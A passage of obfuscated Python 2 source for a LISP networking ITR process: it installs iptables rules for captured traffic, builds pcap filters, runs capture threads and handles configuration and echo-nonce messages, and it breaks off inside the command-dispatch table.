if 15 - 15: I1ii11iIi11i + OOooOOo / I1ii11iIi11i / I1Ii111
if 31 - 31: ooOoO0o + O0 + ooOoO0o . iIii1I11I1II1 + Oo0Ooo / o0oOOo0O0Ooo
if 6 - 6: Oo0Ooo % IiII * I11i / I1IiiI + Oo0Ooo
if 39 - 39: OoOoOO00 - Oo0Ooo / iII111i * OoooooooOO
def OO0oOOoo ( sources , dyn_eids ) :
    """Install iptables/ip6tables raw-table rules so the kernel does not
    route packets that the ITR will capture and encapsulate itself.

    Rule layout in the custom 'lisp' chain: ACCEPT loopback/link-local/
    multicast control ranges and our own addresses, ACCEPT intra-site
    EID-to-EID traffic (unless PITR), then DROP all other EID-sourced
    packets so they are handled only via pcap.

    Args:
        sources: EID-prefix strings to filter on.
        dyn_eids: dynamic-EID prefixes, excluded from the intra-site
            ACCEPT rules.

    NOTE: uses the Python-2-only 'commands' module (removed in Python 3);
    the 'if N - N:' lines are obfuscator no-ops.
    """
    # Escape hatch: the operator may manage iptables themselves.
    if ( os . getenv ( "LISP_NO_IPTABLES" ) != None ) :
        lisp . lprint ( "User selected to suppress installing iptables rules" )
        return
    if 100 - 100: O0 . I11i . OoO0O00 + O0 * oO0o
    if 42 - 42: oO0o % OoooooooOO + o0oOOo0O0Ooo
    # Create the 'lisp' chain and jump to it from PREROUTING (v4 and v6).
    os . system ( "sudo iptables -t raw -N lisp" )
    os . system ( "sudo iptables -t raw -A PREROUTING -j lisp" )
    os . system ( "sudo ip6tables -t raw -N lisp" )
    os . system ( "sudo ip6tables -t raw -A PREROUTING -j lisp" )
    if 56 - 56: OoooooooOO + I1ii11iIi11i - iII111i
    if 24 - 24: o0oOOo0O0Ooo + ooOoO0o + I11i - iIii1I11I1II1
    if 49 - 49: I11i . ooOoO0o * OoOoOO00 % IiII . O0
    if 48 - 48: O0 * Ii1I - O0 / Ii1I + OoOoOO00
    if 52 - 52: OoO0O00 % Ii1I * II111iiii
    if 4 - 4: I11i % O0 - OoooooooOO + ooOoO0o . oO0o % II111iiii
    if 9 - 9: II111iiii * II111iiii . i11iIiiIii * iIii1I11I1II1
    if 18 - 18: OoO0O00 . II111iiii % OoOoOO00 % Ii1I
    # ACCEPT loopback, link-local, multicast-control ranges, configured
    # EID-prefixes, and every address assigned to this host.
    oo0i1iIIi1II1iiI = "sudo ip{}tables -t raw -A lisp -j ACCEPT -d {}"
    III1Ii1i1I1 = [ "127.0.0.1" , "::1" , "224.0.0.0/4 -p igmp" , "ff00::/8" ,
        "fe80::/16" ]
    III1Ii1i1I1 += sources + lisp . lisp_get_all_addresses ( )
    for O0O00OooO in III1Ii1i1I1 :
        if ( lisp . lisp_is_mac_string ( O0O00OooO ) ) : continue
        # Select iptables vs ip6tables from address family.
        I1IiI1iI11 = "" if O0O00OooO . find ( ":" ) == - 1 else "6"
        os . system ( oo0i1iIIi1II1iiI . format ( I1IiI1iI11 , O0O00OooO ) )
    if 2 - 2: iIii1I11I1II1
    if 45 - 45: OoooooooOO / i11iIiiIii
    if 10 - 10: iII111i - oO0o * iIii1I11I1II1 % iIii1I11I1II1 * IiII - I1ii11iIi11i
    if 97 - 97: II111iiii % I1Ii111 + I1Ii111 - OoO0O00 / Ii1I * I1IiiI
    if 17 - 17: Ii1I
    if 39 - 39: ooOoO0o . II111iiii
    if 45 - 45: oO0o * OoOoOO00 / iIii1I11I1II1
    if 77 - 77: I1Ii111 - I11i
    # Intra-site: ACCEPT EID-to-EID pairs of the same address family
    # (skipped for PITR, and for dynamic EIDs which must be captured).
    if ( lisp . lisp_pitr == False ) :
        oo0i1iIIi1II1iiI = "sudo ip{}tables -t raw -A lisp -j ACCEPT -s {} -d {}"
        iiI1iI1I = "sudo ip{}tables -t raw -C lisp -j ACCEPT -s {} -d {}"
        for II11 in sources :
            if ( lisp . lisp_is_mac_string ( II11 ) ) : continue
            if ( II11 in dyn_eids ) : continue
            I1IiI1iI11 = "" if II11 . find ( ":" ) == - 1 else "6"
            for O0OOO0OOoO0O in sources :
                if ( lisp . lisp_is_mac_string ( O0OOO0OOoO0O ) ) : continue
                if ( O0OOO0OOoO0O in dyn_eids ) : continue
                # Only pair addresses of the same family.
                if ( O0OOO0OOoO0O . find ( "." ) != - 1 and II11 . find ( "." ) == - 1 ) : continue
                if ( O0OOO0OOoO0O . find ( ":" ) != - 1 and II11 . find ( ":" ) == - 1 ) : continue
                # 'iptables -C' prints nothing when the rule already
                # exists; skip re-adding it in that case.
                if ( commands . getoutput ( iiI1iI1I . format ( I1IiI1iI11 , II11 , O0OOO0OOoO0O ) ) == "" ) :
                    continue
                if 27 - 27: I1ii11iIi11i * I1Ii111 - OoO0O00 + Ii1I * Ii1I
                os . system ( oo0i1iIIi1II1iiI . format ( I1IiI1iI11 , II11 , O0OOO0OOoO0O ) )
    if 55 - 55: ooOoO0o
    if 82 - 82: I1Ii111 - OOooOOo + OoO0O00
    if 64 - 64: o0oOOo0O0Ooo . O0 * Ii1I + OoooooooOO - Oo0Ooo . OoooooooOO
    if 70 - 70: Oo0Ooo - oO0o . iIii1I11I1II1 % I11i / OoOoOO00 - O0
    if 55 - 55: iII111i - OoO0O00
    if 100 - 100: O0
    if 79 - 79: iIii1I11I1II1
    # Final rule: DROP everything else sourced from our EID-prefixes so
    # the kernel never forwards what pcap will encapsulate.
    O00oO0o = "sudo ip{}tables -t raw -A lisp -j DROP -s {}"
    for II11 in sources :
        if ( lisp . lisp_is_mac_string ( II11 ) ) : continue
        I1IiI1iI11 = "" if II11 . find ( ":" ) == - 1 else "6"
        os . system ( O00oO0o . format ( I1IiI1iI11 , II11 ) )
    if 15 - 15: I1Ii111 + I11i . OoooooooOO . i11iIiiIii
    if 31 - 31: OoooooooOO + iII111i - OoOoOO00 . i1IIi % iII111i
    if 43 - 43: OOooOOo * ooOoO0o / iIii1I11I1II1 - Ii1I * Ii1I
    if 60 - 60: iIii1I11I1II1 . OOooOOo + I1ii11iIi11i
    if 44 - 44: O0 . oO0o * i11iIiiIii % i11iIiiIii + O0 / OOooOOo
    # Log the installed rule set for diagnostics.
    o00oOOO0Ooo = commands . getoutput ( "sudo iptables -t raw -S lisp" ) . split ( "\n" )
    o00oOOO0Ooo += commands . getoutput ( "sudo ip6tables -t raw -S lisp" ) . split ( "\n" )
    lisp . lprint ( "Using kernel filters: {}" . format ( o00oOOO0Ooo ) )
    if 50 - 50: Ii1I - i11iIiiIii + iIii1I11I1II1 / O0 - Ii1I + o0oOOo0O0Ooo
    if 22 - 22: II111iiii - Ii1I / ooOoO0o % OoooooooOO + OOooOOo
    if 5 - 5: OoO0O00 / iII111i + i11iIiiIii % I11i
    if 93 - 93: OoOoOO00 % iIii1I11I1II1
    if 90 - 90: I1IiiI - OOooOOo / Ii1I / O0 / I11i
    if 87 - 87: OoOoOO00 / IiII + iIii1I11I1II1
    if 93 - 93: iIii1I11I1II1 + oO0o % ooOoO0o
    if 21 - 21: OOooOOo
    if 6 - 6: IiII
    if 46 - 46: IiII + oO0o
    if 79 - 79: OoooooooOO - IiII * IiII . OoOoOO00
    # virtio NICs can deliver packets with unfilled checksums; force the
    # kernel to fill TCP/UDP checksums in the mangle table.
    if ( os . getenv ( "LISP_VIRTIO_BUG" ) != None ) :
        Oo00ooO0OoOo = ( "sudo iptables -A POSTROUTING -t mangle -p tcp -j " + "CHECKSUM --checksum-fill; " )
        if 99 - 99: OoOoOO00
        Oo00ooO0OoOo += ( "sudo iptables -A POSTROUTING -t mangle -p udp -j " + "CHECKSUM --checksum-fill; " )
        if 77 - 77: o0oOOo0O0Ooo
        Oo00ooO0OoOo += ( "sudo ip6tables -A POSTROUTING -t mangle -p tcp -j " + "CHECKSUM --checksum-fill; " )
        if 48 - 48: OoOoOO00 % I1ii11iIi11i / I11i . iIii1I11I1II1 * II111iiii
        Oo00ooO0OoOo += ( "sudo ip6tables -A POSTROUTING -t mangle -p udp -j " + "CHECKSUM --checksum-fill" )
        if 65 - 65: OoOoOO00
        os . system ( Oo00ooO0OoOo )
        I1iI11I1III1 = lisp . bold ( "virtio" , False )
        lisp . lprint ( "{} bug workaround, configure '{}'" . format ( I1iI11I1III1 , Oo00ooO0OoOo ) )
    if 8 - 8: i11iIiiIii / II111iiii + o0oOOo0O0Ooo * Ii1I % IiII . I11i
    return
if 6 - 6: IiII % Oo0Ooo . Oo0Ooo - I1ii11iIi11i / I11i . i1IIi
if 99 - 99: OoOoOO00 . I1Ii111
if 59 - 59: I11i / Oo0Ooo / OOooOOo / O0 / OoOoOO00 + o0oOOo0O0Ooo
if 13 - 13: o0oOOo0O0Ooo % oO0o / I1Ii111 % I1Ii111 % O0
if 90 - 90: IiII . ooOoO0o / iIii1I11I1II1
if 28 - 28: IiII + oO0o - ooOoO0o / iIii1I11I1II1 - I1IiiI
if 45 - 45: O0 / i1IIi * oO0o * OoO0O00
def o00oOo0oOoo(sources, dyn_eids, l2_overlay, pitr):
    """Build and return the pcap filter string used by the ITR capture loop.

    Args:
        sources: list of source EID-prefixes (IP prefixes or MAC strings).
        dyn_eids: prefixes that are dynamic-EIDs (excluded from the
            "not (dst net ...)" clause so locally-destined traffic is seen).
        l2_overlay: when True, capture all Ethernet frames (L2 overlay mode).
        pitr: when True (proxy-ITR), capture regardless of destination.

    Returns:
        pcap filter expression string (also logged via lisp.lprint()).
    """
    # L2 overlay: match effectively every Ethernet frame and return early.
    if (l2_overlay):
        i1I11IiI1iiII = "ether[6:4] >= 0 and ether[10:2] >= 0"
        lisp.lprint("Using pcap filter: '{}'".format(i1I11IiI1iiII))
        return (i1I11IiI1iiII)
    if 35 - 35: I1ii11iIi11i / iII111i % I1IiiI + iIii1I11I1II1
    if 79 - 79: OoOoOO00 / ooOoO0o
    # Base clauses: drop ARP; allow RLOC-probe Map-Requests/Replies on 4342
    # and multicast Map-Register-style packets (byte-offset matches below).
    oOo00o = "(not ether proto 0x806)"
    iI1iIIIi1i = " or (udp src port 4342 and ip[28] == 0x28)"
    OOoooooooO = " or (ip[16] >= 224 and ip[16] < 240 and (ip[28] & 0xf0) == 0x30)"
    if 4 - 4: Oo0Ooo + o0oOOo0O0Ooo
    if 17 - 17: OoO0O00 * OoOoOO00
    # Build "src net" (all sources) and "dst net" (non-dynamic sources) lists.
    ii11i = ""
    o00Oo = ""
    for II11 in sources:
        O000oOo = II11
        # MAC-address prefixes are rewritten into an "ether host xx:xx:..."
        # clause (strip mask, remove dashes, regroup into 6 octets).
        if (lisp.lisp_is_mac_string(II11)):
            O000oOo = II11.split("/")[0]
            O000oOo = O000oOo.replace("-", "")
            IiiIIi1 = []
            for O00o00O in range(0, 12, 2): IiiIIi1.append(O000oOo[O00o00O:O00o00O + 2])
            O000oOo = "ether host " + ":".join(IiiIIi1)
        if 28 - 28: o0oOOo0O0Ooo
        if 45 - 45: o0oOOo0O0Ooo . I1IiiI / I1Ii111 - Oo0Ooo * iIii1I11I1II1
        ii11i += "{}".format(O000oOo)
        if (II11 not in dyn_eids): o00Oo += "{}".format(O000oOo)
        # Stop before appending a trailing " or " after the last source.
        if (sources[-1] == II11): break
        ii11i += " or "
        if (II11 not in dyn_eids): o00Oo += " or "
    if 86 - 86: II111iiii + ooOoO0o + IiII
    # The dynamic-EID filtering above can still leave a dangling " or ".
    if (o00Oo[-4::] == " or "): o00Oo = o00Oo[0:-4]
    if 9 - 9: ooOoO0o + II111iiii % ooOoO0o % IiII + iIii1I11I1II1
    if 59 - 59: i1IIi
    if 48 - 48: O0 * Ii1I * OoO0O00 . OoO0O00 * I11i - Ii1I
    if 14 - 14: I1ii11iIi11i + i11iIiiIii
    if 83 - 83: I1ii11iIi11i / i11iIiiIii + II111iiii . iII111i * OOooOOo + IiII
    if 42 - 42: i1IIi % II111iiii . ooOoO0o
    # NOTE: `commands` is Python-2 only; this module predates Python 3.
    # Detect "lisp-nat = yes" in ./lisp.config; if set, the loopback address
    # is excluded from the local-address list below.
    II1II1iI = commands.getoutput("egrep 'lisp-nat = yes' ./lisp.config")
    II1II1iI = (II1II1iI != "" and II1II1iI[0] == " ")
    Ooo = lisp.lisp_get_loopback_address() if (II1II1iI) else None
    if 88 - 88: OoooooooOO
    # Exclude traffic destined to any of this system's own addresses.
    iIiI1I1ii1I1 = ""
    O00oO = lisp.lisp_get_all_addresses()
    for O0O00OooO in O00oO:
        if (O0O00OooO == Ooo): continue
        iIiI1I1ii1I1 += "{}".format(O0O00OooO)
        if (O00oO[-1] == O0O00OooO): break
        iIiI1I1ii1I1 += " or "
    if 83 - 83: o0oOOo0O0Ooo
    if 38 - 38: I1Ii111 + OoooooooOO . i1IIi
    if (ii11i != ""):
        ii11i = " and (src net {})".format(ii11i)
    if 19 - 19: iII111i - o0oOOo0O0Ooo - Ii1I - OoOoOO00 . iII111i . I1Ii111
    if (o00Oo != ""):
        o00Oo = " and not (dst net {})".format(o00Oo)
    if 48 - 48: iII111i + IiII
    if (iIiI1I1ii1I1 != ""):
        iIiI1I1ii1I1 = " and not (dst host {})".format(iIiI1I1ii1I1)
    if 60 - 60: I11i + iII111i . IiII / i1IIi . iIii1I11I1II1
    if 14 - 14: OOooOOo
    if 79 - 79: Ii1I
    if 76 - 76: iIii1I11I1II1
    if 80 - 80: iIii1I11I1II1 . O0 / Ii1I % Ii1I
    if 93 - 93: OoooooooOO * Oo0Ooo
    if 10 - 10: I1Ii111 * OoooooooOO + I11i - I1ii11iIi11i / I1ii11iIi11i . i11iIiiIii
    # Proxy-ITR: capture packets for any destination, and match the system's
    # addresses as either source or destination (drop the "dst " qualifier).
    if (pitr):
        o00Oo = ""
        iIiI1I1ii1I1 = iIiI1I1ii1I1.replace("dst ", "")
    if 22 - 22: I1Ii111 / o0oOOo0O0Ooo
    if 98 - 98: i1IIi
    if 51 - 51: I1ii11iIi11i + ooOoO0o + Oo0Ooo / i1IIi + i1IIi
    if 12 - 12: iIii1I11I1II1 . Ii1I . I1ii11iIi11i % I1IiiI . II111iiii . oO0o
    if 32 - 32: I1ii11iIi11i + IiII / O0 / OoOoOO00 * OoooooooOO % ooOoO0o
    # Assemble the final filter from the clauses built above.
    i1I11IiI1iiII = oOo00o + ii11i + o00Oo + iIiI1I1ii1I1
    i1I11IiI1iiII += iI1iIIIi1i
    i1I11IiI1iiII += OOoooooooO
    if 50 - 50: OoO0O00
    lisp.lprint("Using pcap filter: '{}'".format(i1I11IiI1iiII))
    return (i1I11IiI1iiII)
if 66 - 66: iIii1I11I1II1
if 41 - 41: I1Ii111 . O0 * I1IiiI * I1ii11iIi11i
if 100 - 100: iII111i
if 73 - 73: I1ii11iIi11i % II111iiii
if 79 - 79: OoOoOO00 + OoO0O00 - II111iiii + Ii1I
if 11 - 11: oO0o + iIii1I11I1II1
if 10 - 10: O0
def Oo0000oOo(device, pfilter, pcap_lock):
    """Per-interface packet-capture thread body.

    Opens a live pcap session on `device`, installs `pfilter`, and loops
    forever dispatching captured packets to the module-level callback
    I11i1iIiiIiIi (defined elsewhere in this file).

    Args:
        device: interface name to capture on.
        pfilter: pcap filter expression string.
        pcap_lock: lock serializing pcappy.open_live() across threads.
    """
    lisp.lisp_set_exception()
    if 68 - 68: OOooOOo + oO0o . O0 . Ii1I % i1IIi % OOooOOo
    # open_live() is apparently not thread-safe here, hence the lock.
    # 9000-byte snap length, non-promiscuous, 100 ms read timeout.
    pcap_lock.acquire()
    i1I1iI = pcappy.open_live(device, 9000, 0, 100)
    pcap_lock.release()
    if 92 - 92: Oo0Ooo / i11iIiiIii + I1ii11iIi11i
    i1I1iI.filter = pfilter
    # -1: loop forever; `device` is passed through as callback user-data.
    i1I1iI.loop(-1, I11i1iIiiIiIi, device)
    return
if 87 - 87: OoOoOO00 % iIii1I11I1II1
if 72 - 72: OOooOOo . OOooOOo - I1ii11iIi11i
if 48 - 48: Oo0Ooo - ooOoO0o + Oo0Ooo - I1IiiI * i11iIiiIii . iII111i
if 35 - 35: IiII . O0 + Oo0Ooo + OOooOOo + i1IIi
if 65 - 65: O0 * I1IiiI / I1IiiI . OoOoOO00
if 87 - 87: II111iiii * I1ii11iIi11i % Oo0Ooo * Oo0Ooo
if 58 - 58: OOooOOo . o0oOOo0O0Ooo + I1IiiI % Oo0Ooo - OoO0O00
if 50 - 50: iII111i % II111iiii - ooOoO0o . i1IIi + O0 % iII111i
if 10 - 10: iII111i . i1IIi + Ii1I
def oOOoOOO0oo0():
    """Periodic timer callback: send NAT-traversal Info-Requests.

    Builds Info-Request messages on the ITR sockets and reschedules itself
    every lisp.LISP_INFO_INTERVAL seconds via the module-level timer I11.
    """
    global I11
    global II1Ii1iI1i
    global II1iII1i
    if 87 - 87: ooOoO0o / OoOoOO00 % o0oOOo0O0Ooo * oO0o
    lisp.lisp_set_exception()
    if 77 - 77: oO0o - Oo0Ooo - iIii1I11I1II1
    if 16 - 16: OoO0O00 / iII111i / i1IIi . iII111i + oO0o
    if 26 - 26: iIii1I11I1II1 + i1IIi / OoOoOO00 % I1ii11iIi11i
    if 44 - 44: OoooooooOO . II111iiii . OOooOOo % OoooooooOO
    if 86 - 86: i11iIiiIii + O0 * IiII - OoO0O00 * OOooOOo + O0
    # Socket list: [IPv4-send, IPv6-send, IPC]; here the same control socket
    # is used for both send slots, plus the lisp-itr IPC socket.
    Oo0 = [II1Ii1iI1i, II1Ii1iI1i,
           oO0oIIII]
    lisp.lisp_build_info_requests(Oo0, None, lisp.LISP_CTRL_PORT)
    if 94 - 94: I1Ii111 % II111iiii * i1IIi * iIii1I11I1II1
    if 81 - 81: Oo0Ooo - I11i
    if 24 - 24: OoooooooOO . OoO0O00 * II111iiii
    if 59 - 59: I1Ii111 + OoO0O00 / OOooOOo
    # Cancel any pending timer before re-arming to avoid duplicates.
    I11.cancel()
    I11 = threading.Timer(lisp.LISP_INFO_INTERVAL,
                          oOOoOOO0oo0, [])
    I11.start()
    return
if 97 - 97: Oo0Ooo * iII111i % ooOoO0o . iII111i - I1Ii111 - OOooOOo
if 79 - 79: I1IiiI - ooOoO0o
if 37 - 37: IiII . Oo0Ooo * Oo0Ooo * II111iiii * O0
if 83 - 83: IiII / I1Ii111
if 64 - 64: OoO0O00 % IiII . I1Ii111 % OoO0O00 + I11i * IiII
if 83 - 83: o0oOOo0O0Ooo % oO0o + I11i % i11iIiiIii + O0
if 65 - 65: iIii1I11I1II1 % oO0o + O0 / OoooooooOO
def O0000oO0o00(kv_pair):
    """Process a 'lisp map-resolver' configuration command.

    Delegates parsing to lispconfig, then (re)starts the Map-Resolver
    liveness test timer and kicks off the Info-Request timer immediately.

    Args:
        kv_pair: parsed key/value pairs from the command clause.
    """
    global II1iII1i
    global iiI1iIiI
    global I11
    if 80 - 80: OoooooooOO + IiII
    lispconfig.lisp_map_resolver_command(kv_pair)
    if 95 - 95: I1Ii111 / oO0o * I1Ii111 - OoooooooOO * OoooooooOO % OoO0O00
    # Start a one-shot 2-second timer to probe the configured Map-Resolvers,
    # unless a previous probe timer is still running.
    if (lisp.lisp_test_mr_timer == None or
        lisp.lisp_test_mr_timer.is_alive() == False):
        lisp.lisp_test_mr_timer = threading.Timer(2, lisp.lisp_test_mr,
                                                  [II1iII1i, iiI1iIiI])
        lisp.lisp_test_mr_timer.start()
    if 43 - 43: Oo0Ooo . I1Ii111
    if 12 - 12: I1Ii111 + OOooOOo + I11i . IiII / Ii1I
    if 29 - 29: IiII . ooOoO0o - II111iiii
    if 68 - 68: iIii1I11I1II1 + II111iiii / oO0o
    if 91 - 91: OoOoOO00 % iIii1I11I1II1 . I1IiiI
    # Fire the Info-Request sender (oOOoOOO0oo0) right away; it reschedules
    # itself periodically thereafter.
    I11 = threading.Timer(0, oOOoOOO0oo0, [])
    I11.start()
    return
if 70 - 70: I11i % II111iiii % O0 . i1IIi / I1Ii111
if 100 - 100: I1ii11iIi11i * i11iIiiIii % oO0o / Oo0Ooo / ooOoO0o + I1ii11iIi11i
if 59 - 59: I1Ii111 - IiII
if 14 - 14: iIii1I11I1II1 - iIii1I11I1II1
if 5 - 5: IiII
if 84 - 84: II111iiii * oO0o * II111iiii % IiII / I1IiiI
if 100 - 100: IiII . Ii1I - iIii1I11I1II1 . i11iIiiIii / II111iiii
if 71 - 71: I1Ii111 * Oo0Ooo . I11i
def i1ii1iiIi1II(kv_pair):
    """Handle a 'lisp database-mapping' command clause.

    Thin wrapper that forwards the parsed key/value pairs straight to
    lispconfig.lisp_database_mapping_command().
    """
    lispconfig.lisp_database_mapping_command(kv_pair)
if 98 - 98: OoO0O00 - Ii1I . IiII % i11iIiiIii
if 69 - 69: I1ii11iIi11i + iII111i * O0 . OOooOOo % OoOoOO00
if 96 - 96: ooOoO0o . ooOoO0o - I11i / I11i
if 96 - 96: i11iIiiIii / I1IiiI - O0 . ooOoO0o
if 39 - 39: ooOoO0o / O0 * IiII
if 17 - 17: Ii1I / iIii1I11I1II1 - OoO0O00 + I1IiiI % OOooOOo
if 14 - 14: o0oOOo0O0Ooo % IiII + I1ii11iIi11i + OoO0O00
if 76 - 76: OoO0O00 - i11iIiiIii + OoOoOO00 + OOooOOo / OoooooooOO
def IiI1Iii1(kv_pair):
    """Process a 'lisp xtr-parameters' configuration command.

    Snapshots nat-traversal/rloc-probing flags, applies the command, then
    starts RLOC-probing if either feature was just enabled, allocates the
    lisp-crypto ephemeral port if data-plane security is on, and pushes the
    updated xTR parameters to the data-plane over IPC.
    """
    global i111I
    if 85 - 85: i11iIiiIii / i11iIiiIii . OoO0O00 . O0
    if 67 - 67: II111iiii / o0oOOo0O0Ooo . OOooOOo . OoooooooOO
    if 19 - 19: IiII . I1ii11iIi11i / OoOoOO00
    if 68 - 68: ooOoO0o / OoooooooOO * I11i / oO0o
    if 88 - 88: o0oOOo0O0Ooo
    # Remember pre-command state so we can detect 0 -> 1 transitions below.
    iI11 = lisp.lisp_nat_traversal
    OO0O00O = lisp.lisp_rloc_probing
    if 31 - 31: i11iIiiIii
    if 12 - 12: ooOoO0o
    if 86 - 86: oO0o - OoO0O00
    if 63 - 63: I1IiiI / OoOoOO00 + OoooooooOO . I11i . ooOoO0o
    lispconfig.lisp_xtr_command(kv_pair)
    if 48 - 48: i1IIi - iII111i - i11iIiiIii . I11i - iII111i * I11i
    if 60 - 60: OoOoOO00 / I1ii11iIi11i + OOooOOo - iII111i
    if 49 - 49: OoO0O00 - O0 / OoO0O00 * OoOoOO00 + I1Ii111
    if 35 - 35: II111iiii . I1IiiI / i1IIi / I1IiiI * oO0o
    # nat-traversal just turned on (with probing): delay probes 5 seconds;
    # rloc-probing alone just turned on: start after 1 second.
    Oo0O0000Oo00o = (iI11 == False and lisp.lisp_nat_traversal and lisp.lisp_rloc_probing)
    if 20 - 20: OoO0O00 . I1IiiI * i11iIiiIii / i11iIiiIii
    o00 = (OO0O00O == False and lisp.lisp_rloc_probing)
    if 4 - 4: OoO0O00
    ooOO = 0
    if (o00): ooOO = 1
    if (Oo0O0000Oo00o): ooOO = 5
    if 5 - 5: OoooooooOO / o0oOOo0O0Ooo % I11i % OoO0O00 * iII111i + iIii1I11I1II1
    if (ooOO != 0):
        I11iiI11iiI = [i111I, i111I]
        lisp.lisp_start_rloc_probe_timer(ooOO, I11iiI11iiI)
    if 51 - 51: oO0o . iIii1I11I1II1 + OoO0O00 * Ii1I + i1IIi
    if 81 - 81: O0 - Ii1I + Oo0Ooo
    if 67 - 67: Ii1I
    if 43 - 43: OoO0O00 % OoO0O00
    if 46 - 46: Oo0Ooo % iIii1I11I1II1 . iII111i . O0 * ooOoO0o / OoooooooOO
    if 7 - 7: oO0o - O0 * I11i - o0oOOo0O0Ooo - II111iiii
    if 41 - 41: I1IiiI - I1Ii111 % II111iiii . I1Ii111 - I11i
    # First time data-plane security is enabled: record this socket's local
    # port as the lisp-crypto port and tell the data-plane about it.
    if (lisp.lisp_crypto_ephem_port == None and lisp.lisp_data_plane_security):
        O00oooo00o0O = i111I.getsockname()[1]
        lisp.lisp_crypto_ephem_port = O00oooo00o0O
        lisp.lprint("Use port {} for lisp-crypto packets".format(O00oooo00o0O))
        i1I111Ii = {"type": "itr-crypto-port", "port": O00oooo00o0O}
        lisp.lisp_write_to_dp_socket(i1I111Ii)
    if 31 - 31: I1IiiI
    if 73 - 73: ooOoO0o . O0 / o0oOOo0O0Ooo - OoooooooOO % i11iIiiIii
    if 80 - 80: Ii1I / ooOoO0o % O0 . Oo0Ooo
    if 63 - 63: OOooOOo . II111iiii . I11i
    if 46 - 46: ooOoO0o % IiII - o0oOOo0O0Ooo - Oo0Ooo - Ii1I / I11i
    # Propagate logging flags to the external data-plane process.
    lisp.lisp_ipc_write_xtr_parameters(lisp.lisp_debug_logging,
                                       lisp.lisp_data_plane_logging)
    return
if 68 - 68: i1IIi - I1ii11iIi11i / Oo0Ooo % I11i . iII111i
if 9 - 9: IiII
if 48 - 48: o0oOOo0O0Ooo + o0oOOo0O0Ooo - Oo0Ooo
if 27 - 27: OoO0O00 + OoOoOO00 * ooOoO0o
if 83 - 83: iIii1I11I1II1
if 72 - 72: I11i
if 87 - 87: i1IIi
if 48 - 48: Oo0Ooo * oO0o * iIii1I11I1II1 + i11iIiiIii - OoooooooOO
if 38 - 38: OoOoOO00 / iIii1I11I1II1 % i11iIiiIii - IiII * iII111i / OoOoOO00
def iIII11I1I1II(ipc):
    """Process a 'nonce%' IPC message from the ETR for echo-nonce tracking.

    The message format is "nonce%<R-or-E>%<rloc-string>%<hex-nonce>":
    opcode "R" means a request-nonce was received (start echoing it back);
    opcode "E" means an echoed nonce was received (match it against the
    request-nonce we sent and, on match, leave request-nonce mode).
    """
    ii1IIiII111I, O00OoOoO, ooO0o0oo, O0O000OOOo = ipc.split("%")
    O0O000OOOo = int(O0O000OOOo, 16)
    if 79 - 79: IiII % OoO0O00
    # Look up (or lazily create) the echo-nonce state for this RLOC.
    Oo0oOO = lisp.lisp_get_echo_nonce(None, ooO0o0oo)
    if (Oo0oOO == None): Oo0oOO = lisp.lisp_echo_nonce(ooO0o0oo)
    if 86 - 86: iIii1I11I1II1 / O0
    if 17 - 17: II111iiii
    if 9 - 9: OoooooooOO + oO0o
    if 33 - 33: O0
    if 39 - 39: I1IiiI + Oo0Ooo
    # "R": remote side requested a nonce echo; remember it and start
    # echoing this nonce on packets we send.
    if (O00OoOoO == "R"):
        Oo0oOO.request_nonce_rcvd = O0O000OOOo
        Oo0oOO.last_request_nonce_rcvd = lisp.lisp_get_timestamp()
        Oo0oOO.echo_nonce_sent = O0O000OOOo
        Oo0oOO.last_new_echo_nonce_sent = lisp.lisp_get_timestamp()
        lisp.lprint("Start echo-nonce mode for {}, nonce 0x{}".format(lisp.red(Oo0oOO.rloc_str, False), lisp.lisp_hex_string(O0O000OOOo)))
    if 83 - 83: i1IIi
    if 76 - 76: Ii1I + iIii1I11I1II1 + OoOoOO00 . OoO0O00
    if 49 - 49: IiII / ooOoO0o / OOooOOo
    # "E": remote side echoed a nonce back to us.
    if (O00OoOoO == "E"):
        Oo0oOO.echo_nonce_rcvd = O0O000OOOo
        Oo0oOO.last_echo_nonce_rcvd = lisp.lisp_get_timestamp()
        if 25 - 25: I1IiiI % O0 + i1IIi - ooOoO0o
        if (Oo0oOO.request_nonce_sent == O0O000OOOo):
            # The echoed nonce matches what we sent: the RLOC is reachable,
            # so stop request-nonce mode and record the good echo time.
            III1IiI1i1i = lisp.bold("echoed nonce", False)
            lisp.lprint("Received {} {} from {}".format(III1IiI1i1i,
                        lisp.lisp_hex_string(O0O000OOOo),
                        lisp.red(Oo0oOO.rloc_str, False)))
            if 94 - 94: iII111i - Oo0Ooo + oO0o
            Oo0oOO.request_nonce_sent = None
            lisp.lprint("Stop request-nonce mode for {}".format(lisp.red(Oo0oOO.rloc_str, False)))
            if 59 - 59: I11i . I1IiiI - iIii1I11I1II1 + iIii1I11I1II1
            Oo0oOO.last_good_echo_nonce_rcvd = lisp.lisp_get_timestamp()
        else:
            # Mismatch (or no request outstanding): just log what happened.
            oO0o0Oo = "none"
            if (Oo0oOO.request_nonce_sent):
                oO0o0Oo = lisp.lisp_hex_string(Oo0oOO.request_nonce_sent)
            if 76 - 76: ooOoO0o / OoOoOO00 + I1ii11iIi11i
            lisp.lprint(("Received echo-nonce 0x{} from {}, but request-" + "nonce is {}").format(lisp.lisp_hex_string(O0O000OOOo),
                        lisp.red(Oo0oOO.rloc_str, False), oO0o0Oo))
        if 65 - 65: OoOoOO00
        if 91 - 91: IiII + Ii1I % Ii1I - O0 - i11iIiiIii
    return
if 84 - 84: Oo0Ooo % iII111i % OoooooooOO + OOooOOo % i11iIiiIii
if 47 - 47: i1IIi + II111iiii . Oo0Ooo * oO0o . I11i / i1IIi
if 50 - 50: I1Ii111 / i1IIi % OoooooooOO
if 83 - 83: I1ii11iIi11i * I1ii11iIi11i + OOooOOo
if 57 - 57: O0 - O0 . I1ii11iIi11i / o0oOOo0O0Ooo / Ii1I
# Command-dispatch table for the lisp-itr process. Keys are configuration /
# show clause names; each value is [handler, {parameter-name: spec}] where a
# spec is [required-flag] for free-form values, [flag, "yes", "no"] for
# booleans, or [flag, min, max] for bounded integers. Consumed by
# lispconfig.lisp_process_command() in the main loop below.
I1IiII1I1i1I1 = {
    "lisp xtr-parameters": [IiI1Iii1, {
        "rloc-probing": [True, "yes", "no"],
        "nonce-echoing": [True, "yes", "no"],
        "data-plane-security": [True, "yes", "no"],
        "data-plane-logging": [True, "yes", "no"],
        "frame-logging": [True, "yes", "no"],
        "flow-logging": [True, "yes", "no"],
        "nat-traversal": [True, "yes", "no"],
        "checkpoint-map-cache": [True, "yes", "no"],
        "ipc-data-plane": [True, "yes", "no"],
        "decentralized-push-xtr": [True, "yes", "no"],
        "decentralized-pull-xtr-modulus": [True, 1, 0xff],
        "decentralized-pull-xtr-dns-suffix": [True],
